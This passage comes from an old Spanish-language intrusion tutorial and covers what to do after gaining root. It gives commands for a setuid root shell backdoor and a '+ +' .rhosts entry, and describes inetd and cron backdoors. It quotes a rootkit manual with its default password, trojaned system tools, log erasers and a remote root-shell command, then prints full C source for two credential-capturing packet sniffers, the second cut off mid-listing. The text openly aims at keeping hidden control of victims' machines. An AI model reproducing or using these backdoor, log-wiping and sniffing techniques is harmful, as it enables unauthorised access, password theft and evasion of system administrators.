  11565.   en el syslog.conf que tambien indica los logs de los tcp wrappers.
  11566.  
  11567.         Ademas hemos de ver los logs del httpd, ftp, etc. que pueden tener
  11568.   distintas ubicaciones segun los distintos sistemas. Estos pueden estar en
  11569.   los mismos directorios que los tipicos utmp, wtmp, lastlog, acct o por
  11570.   ejemplo los de httpd pueden estar en el directorio donde se ubica el httpd.
  11571.  
  11572.         Un sistema un poco cutre que puede ayudar es hacer un find / -name
  11573.   *log* con lo que te buscara todos los archivos en la maquina que contengan
  11574.   en su nombre la palabra log con lo que te puede dar pistas de por donde
  11575.   mirar ya que muchos logs tienen la palabra log en su nombre como el
  11576.   log_access, xferlog, etc..
  11577.  
  11578.         Una forma de comprobar otros ficheros de log existentes en el sistema,
  11579.   es verificar cuales son todos aquellos archivos que se encuentran abiertos
  11580.   en el momento, y por ello, lo que podemos conseguir es una pista de cuales
  11581.   son algunos de los posibles lugares en los que se puede almacenar
  11582.   informacion que comprometa al usuario. Un programa para ello es el LSOF
  11583.   (LiSt Open Files), el cual nos indicar los ficheros que se encuentran
  11584.   abiertos en ese momento.
  11585.  
  11586.         En fin, este tema es mucho mas complejo, pero creo que extenderse mas
  11587.   se escapa de los objetivos de este texto y ademas la mejor manera de
  11588.   aprender sobre estas kosas es probando, viendo makinas, probando programas,
  11589.   etc.
  11590.  
  11591.   10.- PRESERVAR EL ACCESO Y PONER SNIFFERS
  11592.  
  11593.         Bueno, voy a dar cuatro matices sobre este tema. La idea es que tras
  11594.   haber conseguido un root es interesante instalar backdoors (o mejor una
  11595.   rootkit que es un conjunto de backdoors y otras herramientas) para seguir
  11596.   teniendo acceso como root y no tener que repetir el proceso de entrar por
  11597.   una cuenta normal, ejecutar xploit, etc,... ya que esto es un coñazo.
  11598.  
  11599.         Bueno, simplemente comento que hay backdoors para el telnetd, login,
  11600.   fingerd, y muchisimos mas, aunque lo que no hay que hacer es poner sushis o
  11601.   usar la tipica backdoor en el .rhosts o hosts.equiv ya que esos se notan
  11602.   mucho y nada mas que el root mire un poco su maquina se dara cuenta.
  11603.  
  11604.         De todos modos, por ser metodos que se han usado mucho y que ademas
  11605.   es posible que algun dia tengas que usarlo si estas ante un sistema
  11606.   operativo raro, voy a explicarlos un poco.
  11607.  
  11608.         Poner una sushi (set uid shell) consiste en que cuando seas root,
  11609.   hacer una copia de la shell, cambiarle el nombre y ponerle como owner al
  11610.   root y luego darle permisos 4755.
  11611.  
  11612.         Es decir... haces:
  11613.  
  11614.   Cp /bin/sh /directoriopublico
  11615.   Mv sh /directoriopublico
  11616.   Cd directoriopublico
  11617.   Mv sh cualquiera
  11618.   chown root cualquiera
  11619.   chmod 4755 cualquiera
  11620.  
  11621.         La gracia de esto es que el 4 indica que cualquiera que ejecute ese
  11622.   fichero tendra privilegios del owner de ese fichero. Asi, como el owner es
  11623.   el root y el fichero es una shell, obtendremos una shell de root con lo que
  11624.   cuando entremos a esta maquina como un usuario normal, simplemente iremos al 
  11625.   directoriopublico, ejecutamos ./cualquiera y tendremos una shell de root.
  11626.  
  11627.         En este momento es importante señalar las diferencias entre UID (User 
  11628.   Identification) y EUID (Efective User Identification), es decir, cuando
  11629.   ejecuteis la sushi tendreis como UID la que tuvieseis del usuario con el
  11630.   que habeis entrado pero tendreis como EUID=0, es decir que teneis
  11631.   privilegios de root para hacerlo todo pero sin embargo si por ejemplo
  11632.   haceis un who aparecera el UID de la cuenta con la que habeis entrado y no
  11633.   aparecereis como root... tened cuidado con este tema que a veces puede
  11634.   ocasionar lios con los permisos y owners de los ficheros.
  11635.  
  11636.         Vale, hasta ahora todo muy bonito pero la desventaja de esto es que
  11637.   te la pueden localizar facilmente haciendo un find -perm 4000 ........ ya
  11638.   que con este comando busca ficheros que tengan estas caracteristicas del
  11639.   bit de setuid activado con lo que el root te puede pillar facilmente por lo
  11640.   que claramente es desaconsejable.
  11641.  
  11642.         Otro metodo, aun pero es poner un + + en el .rhosts del root. Esto
  11643.   quiere decir que cualquiera que haga un rlogin al root desde cualquier
  11644.   maquina sera root sin necesidad de password.. es decir con rlogin -l root
  11645.   maquinavictima.com. Obviamente la desventaja de esto es que el root cuando
  11646.   vea un + + en su .rhosts te pillara y esto es de lo que mas canta por lo
  11647.   que tambien es claramente desaconsejable.
  11648.  
  11649.         Ademas de esto hay programas que substituyen el fingerd, telnetd,
  11650.   login, etc para que cuando tu les des unos datos determinados te dejen
  11651.   entrar como root remotamente. Esta es una buena solucion aunque en algunos
  11652.   casos la longitud del fichero difiere mucho del real al troyano.. pero hay
  11653.   algun metodo mas que ya se comentara en otros textos para que no te pillen
  11654.   por este motivo. Estos troyanos estan en muchos de los lugares de la red
  11655.   asi ke dando un par de vueltas los encontrareis.. igualmente, es posible
  11656.   que esten en la misma maquina de donde os bajeis este texto. Obviamente no
  11657.   son adjuntados por no hacer esto mas grande, que ya se esta haciendo
  11658.   demasiado largo el textito de marras.. jeje
  11659.  
  11660.         Ademas de meter troyanos, tambien hay backdoors usando el inetd, cron
  11661.   y demas.... su funcionamiento es bastante obvio... el inetd define los
  11662.   demonios que se arrancan asociados con cada puerto por lo ke puedes poner
  11663.   asociado a un puerto raro una shell de root... respecto al cron.. es un
  11664.   programa que te permite definir tareas que se repitan periodicamente...
  11665.   puedes hacer ke todos los dias a una hora dada se modifique el archivo
  11666.   /etc/passwd, o que ejecute un socket daemon o mil kosas mas... estas dos
  11667.   backdoors ofrecen muchas posibilidades.. la putada en contra de los
  11668.   troyanos es que nada mas que el root vea el inetd.conf (en el caso del
  11669.   inetd) o el directorio cron se pueden dar cuenta facilmente.
  11670.  
  11671.         Lo que es bastante interesante es instalar una rootkit (el problema
  11672.   es que no estan hechas para muchos sistemas con lo que si te encuentras un
  11673.   sistema operativo para los que no las tienes te lo tienes que currar un
  11674.   poco mas :o(.. este paquete de programas te permiten desde ocultar procesos,
  11675.   ocultar directorios, borrar huellas, dejar mil backdoors, que te oculte en
  11676.   el netstat, que en el ifconfig no aparezca el famoso promiscuos si pones un
  11677.   sniffer, etc. es decir que dejas la maquina hecha un agujero. Obviamente, se
  11678.   puede definir que directorios quieres que te oculte, que backdoors quieres
  11679.   que te ponga, etc. No la adjunto en este texto ya que es bastante grande
  11680.   pero no es dificil obtenerlas en la red. Adjunto aqui unos de los programas
  11681.   que modifica una rootkit cualquiera que he pillado.. en este caso es una de
  11682.   linux (hay versiones posteriores del año 97 de esta rootkit):
  11683.  
  11684.   chfn            Trojaned! User->r00t
  11685.   chsh            Trojaned! User->r00t
  11686.   inetd           Trojaned! Remote access
  11687.   login           Trojaned! Remote access
  11688.   ls              Trojaned! Hide files
  11689.   du              Trojaned! Hide files
  11690.   ifconfig        Trojaned! Hide sniffing
  11691.   netstat Trojaned! Hide connections
  11692.   passwd  Trojaned! User->r00t
  11693.   ps              Trojaned! Hide processes
  11694.   top             Trojaned! Hide processes
  11695.   rshd            Trojaned! Remote access
  11696.   syslogd Trojaned! Hide logs
  11697.   linsniffer      A kewl sniffz0r!
  11698.   sniffit         Another kewl sniffer!
  11699.   fix             File fixer!
  11700.   z2              Zap2 utmp/wtmp/lastlog eraser!
  11701.   wted            wtmp/utmp editor!
  11702.   lled            lastlog editor!
  11703.   bindshell       port/shell type daemon!
  11704.  
  11705.         Y a continuacion su uso de manera breve:
  11706.  
  11707.         OK I will go thru how to use each program one by one. NOTE when I say 
  11708.   passwordI mean the rootkit password not your users password (doh!). By 
  11709.   default therootkit password is lrkr0x.
  11710.  
  11711.   chfn -          Local user->root. Run chfn then when it asks you for a new
  11712.                   name enter your password.
  11713.  
  11714.   chsh -          Local user->root. Run chsh when it asks you for a new shell
  11715.                   enter your password.
  11716.  
  11717.   inetd -         Binds a shell to a port for remote access. hehe look at the
  11718.                   source if u want this one =)
  11719.  
  11720.   login -         Allows login to any account with the rootkit password.
  11721.                   If root login is refused on your terminal login as "rewt".
  11722.                   History logging is disabled if you login using your
  11723.                   password.
  11724.  
  11725.   ls -            Trojaned to hide specified files and dirs.
  11726.                   Default data file is /dev/ptyr.
  11727.                   All files can be listed with 'ls -/'.
  11728.                   The format of /dev/ptyr is:
  11729.                   ptyr
  11730.                   hack.dir
  11731.                   w4r3z
  11732.                   ie. just the filenames. This would hide any files/dirs with
  11733.                   the names ptyr, hack.dir and w4r3z.
  11734.  
  11735.   du -            Same as ls, 'cept for du instead :)
  11736.  
  11737.   ifconfig -      Modified to remove PROMISC flag when sniffing.
  11738.  
  11739.   netstat -       Modified to remove tcp/udp/sockets from or to specified
  11740.                   addresses, uids and ports.
  11741.                   default data file: /dev/ptyq
  11742.                   command 0: hide uid
  11743.                   command 1: hide local address
  11744.                   command 2: hide remote address
  11745.                   command 3: hide local port
  11746.                   command 4: hide remote port
  11747.                   command 5: hide UNIX socket path
  11748.  
  11749.               example:
  11750.               0 500           <- Hides all connections by uid 500
  11751.               1 128.31        <- Hides all local connections from 128.31.X.X
  11752.               2 128.31.39.20  <- Hides all remote connections to 128.31.39.20
  11753.               3 8000          <- Hides all local connections from port 8000
  11754.               4 6667          <- Hides all remote connections to port 6667
  11755.               5 .term/socket  <- Hides all UNIX sockets including the path 
  11756.                                  .term/socket
  11757.        
  11758.         Yeah eyem lazy. This is ira's description. Why bother thinking  up
  11759.    werds when someones already done it?
  11760.  
  11761.   passwd -        Local user->root. Enter your rootkit password instead of
  11762.                   your old password.
  11763.  
  11764.   ps -            Modified to remove specified processes.
  11765.                   Default data file is /dev/ptyp.
  11766.                   An example data file is as follows:
  11767.                   0 0             Strips all processes running under root
  11768.                   1 p0            Strips tty p0
  11769.                   2 sniffer       Strips all programs with the name sniffer
  11770.                   Don't put in the comments, obviously.
  11771.  
  11772.   top -           Identical to ps, 'cept for top instead.
  11773.  
  11774.   rshd -          Execute remote commands as root. 
  11775.                   Usage: rsh -l rootkitpassword host command
  11776.                   ie. rsh -l lrkr0x cert.org /bin/sh -i
  11777.                       would start a root shell.
  11778.  
  11779.   syslogd -       Modified to remove specified strings from logging.
  11780.                   I thought of this one when I was on a system which logged
  11781.                   every connection.. I kept getting pissed off with editing
  11782.                   files every time I connected to remove my hostname. Then I 
  11783.                   thought 'Hey dude, why not trojan syslogd?!' and the rest
  11784.                   is history. :)
  11785.                   Default data file is /dev/ptys
  11786.                   Example data file:
  11787.                   evil.com
  11788.                   123.100.101.202
  11789.                   rshd
  11790.                   This would remove all logs containing the strings evil.com,
  11791.                   123.100.101.202 and rshd. Smart! :))
  11792.  
  11793.   sniffit -       An advanced network sniffer. This is pretty kewl and has
  11794.                   lots of filtering options and other stuff. Useful for
  11795.                   targetting a single host or net. Sniffit uses ncurses.
  11796.  
  11797.   linsniffer -    A kewl sniffer. This is smaller than sniffit and doesn't
  11798.                   need the ncurses libraries.  
  11799.                   As CERT say, sniffing is responsible for more mass network
  11800.                   breakins than anything else in the 90's. P'raps they ain't
  11801.                   heard of Sendmail before hahahaha  
  11802.  
  11803.   fix -           Replaces and fixes timestamp/checksum infomation on files.
  11804.                   I modified this a bit for my own uses and to fix a nasty bug
  11805.                   when replacing syslogd and inetd. The replacement file will
  11806.                   be erased by fix (unlike other versions).  
  11807.  
  11808.   z2 -            Zapper2! Run this to erase the last utmp/wtmp/lastlog
  11809.                   entries for a username. This can be detected since it just
  11810.                   nulls the entry out but no sysadmins know this, right?
  11811.  
  11812.   wted -          This does lots of stuff. U can view ALL the entries in a
  11813.                   wtmp or utmp type file, erase entries by username or
  11814.                   hostname, view zapped users (admins use a util similar to
  11815.                   this to find erased entries), erase zapped users etc.
  11816.  
  11817.   lled -          Basically the same as wted but for lastlog entries. 
  11818.  
  11819.         Creo que con esto queda suficientemente claro no? jeje
  11820.  
  11821.         Como se puede ver, esta rootkit tiene de todo, unos cuantos troyanos,
  11822.   sniffer, borrador de huellas, inetd y login modificados para permitir
  11823.   acceso remoto, editores de wtmp y utmp, etc... en fin, como podeis ver si
  11824.   pillas root en una maquina e instalas una rootkit.. la maquina es tuya asi
  11825.   que no doy ideas.. jejejejejeje. Por cierto a fecha de hoy no encuentro
  11826.   rootkits para irix, aix, hp y demas por lo que si alguien tiene agradeceria
  11827.   que me lo comunicasen (yo solo tengo de sun y de linux... y una para bsd
  11828.   pero que no rula muy bien :o( y currarse una es una kurrada :(
  11829.  
  11830.         Ademas de lo que acabo de comentar, una vez tienes la maquina
  11831.   controlada, lo que has de hacer es poner un sniffer para conseguir mas
  11832.   cuentas (que a veces tambien viene incluida en la rootkit) que se comenta a
  11833.   continuacion.
  11834.  
  11835.         Nota previa: La manera mas usual de conectar maquinas es usando
  11836.   Ethernel. El protocolo de Ethernet trabaja enviando la informacion en
  11837.   paquetes a las maquinas de la red. La cabecera del paquete contiene la
  11838.   direccion IP de la maquina destino. Solo la maquina que tiene este IP va a
  11839.   recibir este paquete en teoria, pero una maquina se puede poner en modo
  11840.   promiscuo de manera que reciba todos los paquetes que van por la red
  11841.   independientemente de lo que ponga en la cabecera como IP de destino.
  11842.  
  11843.         Asi, basicamente un sniffer lo que hace es poner a la maquina en modo 
  11844.   promiscuo, es decir, que la maquina acepta todos los paquetes que van por la 
  11845.   red y no solo los que van destinados a ella.
  11846.  
  11847.         La gracia de esto es que en una red normal (sin usar metodos de
  11848.   encriptacion de passwords como el Kerberos) por la red rulan los paquetes
  11849.   con el login y passwd de otras maquinas con lo que conseguireis cuentas en
  11850.   otras maquinas sin hacer nada.. esta bien no?.
  11851.  
  11852.         El problema es que se puede detectar facilmente si en una maquina hay
  11853.   un sniffer corriendo simplemente haciendo ifconfig -a (en general, aunque
  11854.   varia un poco para algunos sistemas) porque aparece un mensaje de que la
  11855.   maquina esta en promiscous mode... por lo que tendras que poner un troyano
  11856.   para el ifconfig porque si no, el root se percatara y se mosqueara.
  11857.   Recuerdo que en las rootkits vienen incluidos troyanos para el ifconfig.
  11858.  
  11859.         Hay muchisimos sniffers, estos programas permiten muchas opciones
  11860.   como que te permiten sniffear algunos puertos o todos, buscar palabras en
  11861.   los paquetes, etc y los hay desde algunos muy cutres hasta otros
  11862.   comerciales. Algunos nombres son tcpdump, sniffit, esniff, websniff,
  11863.   linsniffer, solsniff, sunsniff, etc.. como veis hay muchos y para distintos
  11864.   sistemas operativos. He cogido de la phrack esta lista de sniffers para
  11865.   distintos sistemas operativos que supongo que sera de interes:
  11866.  
  11867.   OS                      Sniffer
  11868.  
  11869.   4.3/4.4 BSD           tcpdump /* Available via anonymous ftp  */
  11870.   FreeBSD tcpdump /* Available via anonymous ftp at        */
  11871.                   /* gatekeeper.dec.com
  11872.   /.0/BSD/FreeBSD/FreeBSD-current/src/contrib/tcpdump/ */
  11873.   NetBSD  tcpdump /* Available via anonymous ftp at        */
  11874.                  /* gatekeeper.dec.com
  11875.                  /* /.0/BSD/NetBSD/NetBSD-current/src/usr.sbin/ */
  11876.   DEC Unix        tcpdump /* Available via anonymous ftp           */
  11877.   DEC Ultrix      tcpdump /* Available via anonymous ftp           */
  11878.   HP/UX           nettl (monitor) & netfmt (display)
  11879.                           nfswatch        /* Available via anonymous ftp*/
  11880.   Irix                    nfswatch        /* Available via anonymous ftp*/
  11881.                           Etherman
  11882.   Tcpdump /* Available via anonymous ftp           */
  11883.   SunOS          etherfind
  11884.                        Nfswatch  /* Available via anonymous ftp*/
  11885.   tcpdump /* Available via anonymous ftp           */
  11886.   Solaris                 snoop
  11887.                   tcpdump
  11888.   DOS                     ETHLOAD         /* Available via anonymous ftp as*/
  11889.                                           /* ethld104.zip*/
  11890.                     The Gobbler     /* Available via anonymous ftp*/
  11891.                     LanPatrol
  11892.                     LanWatch
  11893.                     Netmon
  11894.                     Netwatch
  11895.                         Netzhack    /* Available via anonymous ftp at*/
  11896.                                     /* mistress.informatik.unibw-muenchen.de*/
  11897.                                     /* /pub/netzhack.mac*/
  11898.   Macintosh       Etherpeek
  11899.  
  11900.         Como veis el TCPDUMP es bastante interesante pero no lo adjunto en el
  11901.   texto por ser bastante grande. Este es un problema de este programa, que es
  11902.   un monitor de red muy potente pero tambien canta mucho si lo metes en una 
  11903.   makina porke tiene muchos archivos y canta bastante al hacer un ps-axw por
  11904.   lo que es mejor evitar usarlo y si estas en una linux o sun, usar sniffers 
  11905.   pequeñitos ke hay para esos sistemas operativos.
  11906.  
  11907.         Aqui adjunto el codigo de un par de sniffers para que veais la forma
  11908.   que tienen aunque obviamente recuerdo que os hacen falta las librerias para
  11909.   que rulen:
  11910.  
  11911. ------------ Codigo Fuente ---------------------------------------------------
  11912.  
  11913. /* ipl.c 1/3/95    by loq */
  11914. /* monitors ip packets for Linux */
  11915. #include <sys/types.h>
  11916. #include <sys/socket.h>
  11917. #include <sys/time.h>
  11918. #include <netinet/in.h>
  11919. #include <linux/if.h>
  11920. #include <signal.h>
  11921. #include <stdio.h>
  11922. #include <linux/socket.h>
  11923. #include <linux/ip.h>
  11924. #include <linux/tcp.h>
  11925. #include <linux/if_ether.h>
  11926.  
  11927. #define BUFLEN 8192
  11928. #define ETHLINKHDR 14
  11929.  
  11930.  
  11931. print_data(int count, char *buff)
  11932. {
  11933.     int i,j,c;
  11934.     int printnext=1;
  11935.     if(count)
  11936.     {
  11937.     if(count%16)
  11938.         c=count+(16-count%16);
  11939.     else c=count;
  11940.     }
  11941.         else
  11942.         c=count;
  11943.     for(i=0;i<c;i++)
  11944.     {
  11945.         if(printnext) { printnext--; printf("%.4x ",i&0xffff); }
  11946.         if(i<count)
  11947.         printf("%3.2x",buff[i]&0xff);
  11948.         else
  11949.         printf("   ");
  11950.         if(!((i+1)%8)) 
  11951.             if((i+1)%16)
  11952.                 printf(" -");
  11953.             else
  11954.                 {
  11955.                     printf("   ");
  11956.                     for(j=i-15;j<=i;j++)
  11957.                       if(j<count) {
  11958.                         if( (buff[j]&0xff) >= 0x20 && 
  11959.                             (buff[j]&0xff)<=0x7e)
  11960.                                                  printf("%c",buff[j]&0xff);
  11961.                         else printf(".");
  11962.                         } else printf(" ");
  11963.                 printf("\n"); printnext=1;
  11964.                 }
  11965.     }
  11966. }
  11967.  
  11968. int
  11969. initdevice(device, pflag)
  11970.     char *device;
  11971.     int pflag;
  11972. {
  11973. #define PROTO htons(0x0800)   /* Ethernet code for IP protocol */
  11974.  
  11975.     int if_fd=0;
  11976.     struct ifreq ifr;
  11977.  
  11978.     if ( (if_fd=socket(AF_INET,SOCK_PACKET,PROTO)) < 0 ) {
  11979.         perror("Can't get socket");
  11980.         exit(2);
  11981.     }
  11982.  
  11983.     strcpy(ifr.ifr_name, device);       /* interface we're gonna use */
  11984.     if( ioctl(if_fd, SIOCGIFFLAGS, &ifr) < 0 ) {    /* get flags */
  11985.         close(if_fd);
  11986.         perror("Can't get flags");
  11987.         exit(2);
  11988.     }
  11989. #if 1
  11990.     if ( pflag )
  11991.                 ifr.ifr_flags |= IFF_PROMISC;       /* set promiscuous mode */
  11992.     else
  11993.         ifr.ifr_flags &= ~(IFF_PROMISC);
  11994. #endif
  11995.  
  11996.     if( ioctl(if_fd, SIOCSIFFLAGS, &ifr) < 0 ) {    /* set flags */
  11997.         close(if_fd);
  11998.         perror("Can't set flags");
  11999.         exit(2);
  12000.     }
  12001.     return if_fd;
  12002. }
  12003.  
  12004. struct etherpacket {
  12005.     struct ethhdr        eth;    
  12006.     struct iphdr        ip;
  12007.     struct tcphdr        tcp;
  12008.     char            data[8192];
  12009.     };
  12010.  
  12011. main()
  12012. {
  12013.     int linktype;
  12014.     int if_eth_fd=initdevice("eth0",1);
  12015. #if 0
  12016.     int if_ppp_fd=initdevice("sl0",1);
  12017. #endif
  12018.     struct etherpacket ep;
  12019.     struct sockaddr dest;
  12020.     struct iphdr *ip;
  12021.     struct tcphdr *tcp;
  12022.     struct timeval timeout;
  12023.     fd_set rd,wr;
  12024.     int dlen;
  12025. #if 0
  12026.     struct slcompress *slc=slhc_init(64,64);    
  12027. #endif
  12028.  
  12029.     for(;;)
  12030.     {
  12031.         bzero(&dest,sizeof(dest));
  12032.         dlen=0;
  12033.         FD_ZERO(&rd);
  12034.         FD_ZERO(&wr);
  12035.         FD_SET(if_eth_fd,&rd);
  12036. #if 0
  12037.         FD_SET(if_ppp_fd,&rd);
  12038. #endif
  12039.         timeout.tv_sec=0;
  12040.         timeout.tv_usec=0;
  12041.         ip=(struct iphdr *)(((unsigned long)&ep.ip)-2);
  12042.         tcp=(struct tcphdr *)(((unsigned long)&ep.tcp)-2);
  12043.         while(timeout.tv_sec==0 && timeout.tv_usec==0)
  12044.         {
  12045.         timeout.tv_sec=10;
  12046.         timeout.tv_usec=0;
  12047.         select(20,&rd,&wr,NULL,&timeout);
  12048.         if(FD_ISSET(if_eth_fd,&rd))
  12049.             {
  12050.             printf("eth\n");
  12051.             recvfrom(if_eth_fd,&ep,sizeof(ep),0,&dest,&dlen);
  12052.             }
  12053. #if 0
  12054.         else
  12055.             if(FD_ISSET(if_ppp_fd,&rd))
  12056.             {
  12057.             recvfrom(if_ppp_fd,&ep,sizeof(ep),0,&dest,&dlen);
  12058.             printf("ppp\n");
  12059.             }
  12060. #endif
  12061.         }    
  12062.  
  12063.         printf("proto: %.4x",ntohs(ep.eth.h_proto));
  12064. #if 0
  12065.         if(ep.eth.h_proto==ntohs(8053))
  12066.         {
  12067.             slhc_uncompress(slc,&ep,sizeof(ep));
  12068.         }
  12069. #endif
  12070.  
  12071.         if(ep.eth.h_proto==ntohs(ETH_P_IP))
  12072.         {
  12073.         printf("%.2x:%.2x:%.2x:%.2x:%.2x:%.2x->",
  12074.             ep.eth.h_source[0],ep.eth.h_source[1],
  12075.             ep.eth.h_source[2],ep.eth.h_source[3],
  12076.             ep.eth.h_source[4],ep.eth.h_source[5]);
  12077.         printf("%.2x:%.2x:%.2x:%.2x:%.2x:%.2x ",
  12078.             ep.eth.h_dest[0],ep.eth.h_dest[1],
  12079.             ep.eth.h_dest[2],ep.eth.h_dest[3],
  12080.             ep.eth.h_dest[4],ep.eth.h_dest[5]);
  12081.         printf("%s[%d]->",inet_ntoa(ip->saddr),ntohs(tcp->source));
  12082.         printf("%s[%d]\n",inet_ntoa(ip->daddr),ntohs(tcp->dest));
  12083.         print_data(htons(ip->tot_len)-sizeof(ep.ip)-sizeof(ep.tcp),
  12084.             ep.data-2);
  12085.         }
  12086.     }
  12087. }
  12088.  
  12089. ------------ FIN -------------------------------------------------------------
  12090.  
  12091.         Tambien pongo un sniffer generico para ethernet que aparecio en la
  12092.   PHRACK que esta diseñado para trabajar en SunOs, es muy pequeño y solo
  12093.   captura los primeros 300 bytes de todas las sesiones de telnet, ftp o
  12094.   rlogin:
  12095.  
  12096. ------------ Codigo Fuente ---------------------------------------------------
  12097.  
  12098. /* [JOIN THE POSSE!] */
  12099.  
  12100. /* Esniff.c */
  12101.  
  12102. #include <stdio.h>
  12103. #include <ctype.h>
  12104. #include <string.h>
  12105.  
  12106. #include <sys/time.h>
  12107. #include <sys/file.h>
  12108. #include <sys/stropts.h>
  12109. #include <sys/signal.h>
  12110. #include <sys/types.h>
  12111. #include <sys/socket.h>
  12112. #include <sys/ioctl.h>
  12113.  
  12114. #include <net/if.h>
  12115. #include <net/nit_if.h>
  12116. #include <net/nit_buf.h>
  12117. #include <net/if_arp.h>
  12118.  
  12119. #include <netinet/in.h>
  12120. #include <netinet/if_ether.h>
  12121. #include <netinet/in_systm.h>
  12122. #include <netinet/ip.h>
  12123. #include <netinet/udp.h>
  12124. #include <netinet/ip_var.h>
  12125. #include <netinet/udp_var.h>
  12126. #include <netinet/in_systm.h>
  12127. #include <netinet/tcp.h>
  12128. #include <netinet/ip_icmp.h>
  12129.  
  12130. #include <netdb.h>
  12131. #include <arpa/inet.h>
  12132.  
  12133. #define ERR stderr
  12134.  
  12135. char    *malloc();
  12136. char    *device,
  12137.         *ProgName,
  12138.         *LogName;
  12139. FILE    *LOG;
  12140. int     debug=0;
  12141.  
  12142. #define NIT_DEV     "/dev/nit"
  12143. #define CHUNKSIZE   4096        /* device buffer size */
  12144. int     if_fd = -1;
  12145. int     Packet[CHUNKSIZE+32];
  12146.  
  12147. void Pexit(err,msg)
  12148. int err; char *msg;
  12149. { perror(msg);
  12150.   exit(err); }
  12151.  
  12152. void Zexit(err,msg)
  12153. int err; char *msg;
  12154. { fprintf(ERR,msg);
  12155.   exit(err); }
  12156.  
  12157. #define IP          ((struct ip *)Packet)
  12158. #define IP_OFFSET   (0x1FFF)
  12159. #define SZETH       (sizeof(struct ether_header))
  12160. #define IPLEN       (ntohs(ip->ip_len))
  12161. #define IPHLEN      (ip->ip_hl)
  12162. #define TCPOFF      (tcph->th_off)
  12163. #define IPS         (ip->ip_src)
  12164. #define IPD         (ip->ip_dst)
  12165. #define TCPS        (tcph->th_sport)
  12166. #define TCPD        (tcph->th_dport)
  12167. #define IPeq(s,t)   ((s).s_addr == (t).s_addr)
  12168.  
  12169. #define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))
  12170.  
  12171. #define MAXBUFLEN  (128)
  12172. time_t  LastTIME = 0;
  12173.  
  12174. struct CREC {
  12175.      struct CREC *Next,
  12176.                  *Last;
  12177.      time_t  Time;              /* start time */
  12178.      struct in_addr SRCip,
  12179.                     DSTip;
  12180.      u_int   SRCport,           /* src/dst ports */
  12181.              DSTport;
  12182.      u_char  Data[MAXBUFLEN+2]; /* important stuff :-) */
  12183.      u_int   Length;            /* current data length */
  12184.      u_int   PKcnt;             /* # pkts */
  12185.      u_long  LASTseq;
  12186. };
  12187.  
  12188. struct CREC *CLroot = NULL;
  12189.  
  12190. char *Symaddr(ip)
  12191. register struct in_addr ip;
  12192. { register struct hostent *he =
  12193.       gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);
  12194.  
  12195.   return( (he)?(he->h_name):(inet_ntoa(ip)) );
  12196. }
  12197.  
  12198. char *TCPflags(flgs)
  12199. register u_char flgs;
  12200. { static char iobuf[8];
  12201. #define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')
  12202.  
  12203.   SFL(0,TH_FIN, 'F');
  12204.   SFL(1,TH_SYN, 'S');
  12205.   SFL(2,TH_RST, 'R');
  12206.   SFL(3,TH_PUSH,'P');
  12207.   SFL(4,TH_ACK, 'A');
  12208.   SFL(5,TH_URG, 'U');
  12209.   iobuf[6]=0;
  12210.   return(iobuf);
  12211. }
  12212.  
  12213. char *SERVp(port)
  12214. register u_int port;
  12215. { static char buf[10];
  12216.   register char *p;
  12217.  
  12218.    switch(port) {
  12219.      case IPPORT_LOGINSERVER: p="rlogin"; break;
  12220.      case IPPORT_TELNET:      p="telnet"; break;
  12221.      case IPPORT_SMTP:        p="smtp"; break;
  12222.      case IPPORT_FTP:         p="ftp"; break;
  12223.      default: sprintf(buf,"%u",port); p=buf; break;
  12224.    }
  12225.    return(p);
  12226. }
  12227.  
  12228. char *Ptm(t)
  12229. register time_t *t;
  12230. { register char *p = ctime(t);
  12231.   p[strlen(p)-6]=0; /* strip " YYYY\n" */
  12232.   return(p);
  12233. }
  12234.  
  12235. char *NOWtm()
  12236. { time_t tm;
  12237.   time(&tm);
  12238.   return( Ptm(&tm) );
  12239. }
  12240.  
  12241. #define MAX(a,b) (((a)>(b))?(a):(b))
  12242. #define MIN(a,b) (((a)<(b))?(a):(b))
  12243.  
  12244. /* add an item */
  12245. #define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \
  12246.   register struct CREC *CLtmp = \
  12247.         (struct CREC *)malloc(sizeof(struct CREC)); \
  12248.   time( &(CLtmp->Time) ); \
  12249.   CLtmp->SRCip.s_addr = SIP.s_addr; \
  12250.   CLtmp->DSTip.s_addr = DIP.s_addr; \
  12251.   CLtmp->SRCport = SPORT; \
  12252.   CLtmp->DSTport = DPORT; \
  12253.   CLtmp->Length = MIN(LEN,MAXBUFLEN); \
  12254.   bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \
  12255.   CLtmp->PKcnt = 1; \
  12256.   CLtmp->Next = CLroot; \
  12257.   CLtmp->Last = NULL; \
  12258.   CLroot = CLtmp; \
  12259. }
  12260.  
  12261. register struct CREC *GET_NODE(Sip,SP,Dip,DP)
  12262. register struct in_addr Sip,Dip;
  12263. register u_int SP,DP;
  12264. { register struct CREC *CLr = CLroot;
  12265.  
  12266.   while(CLr != NULL) {
  12267.     if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&
  12268.         IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )
  12269.             break;
  12270.     CLr = CLr->Next;
  12271.   }
  12272.   return(CLr);
  12273. }
  12274.  
  12275. #define ADDDATA_NODE(CL,DATA,LEN) { \
  12276.  bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \
  12277.  CL->Length += LEN; \
  12278. }
  12279.  
  12280. #define PR_DATA(dp,ln) {    \
  12281.   register u_char lastc=0; \
  12282.   while(ln-- >0) { \
  12283.      if(*dp < 32) {  \
  12284.         switch(*dp) { \
  12285.             case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \
  12286.                         break; \
  12287.             case '\r': \
  12288.             case '\n': fprintf(LOG,"\n     : "); \
  12289.                         break; \
  12290.             default  : fprintf(LOG,"^%c", (*dp + 64)); \
  12291.                         break; \
  12292.         } \
  12293.      } else { \
  12294.         if(isprint(*dp)) fputc(*dp,LOG); \
  12295.         else fprintf(LOG,"(%d)",*dp); \
  12296.      } \
  12297.      lastc = *dp++; \
  12298.   } \
  12299.   fflush(LOG); \
  12300. }
  12301.  
  12302. void END_NODE(CLe,d,dl,msg)
  12303. register struct CREC *CLe;
  12304. register u_char *d;
  12305. register int dl;
  12306. register char *msg;
  12307. {
  12308.    fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));
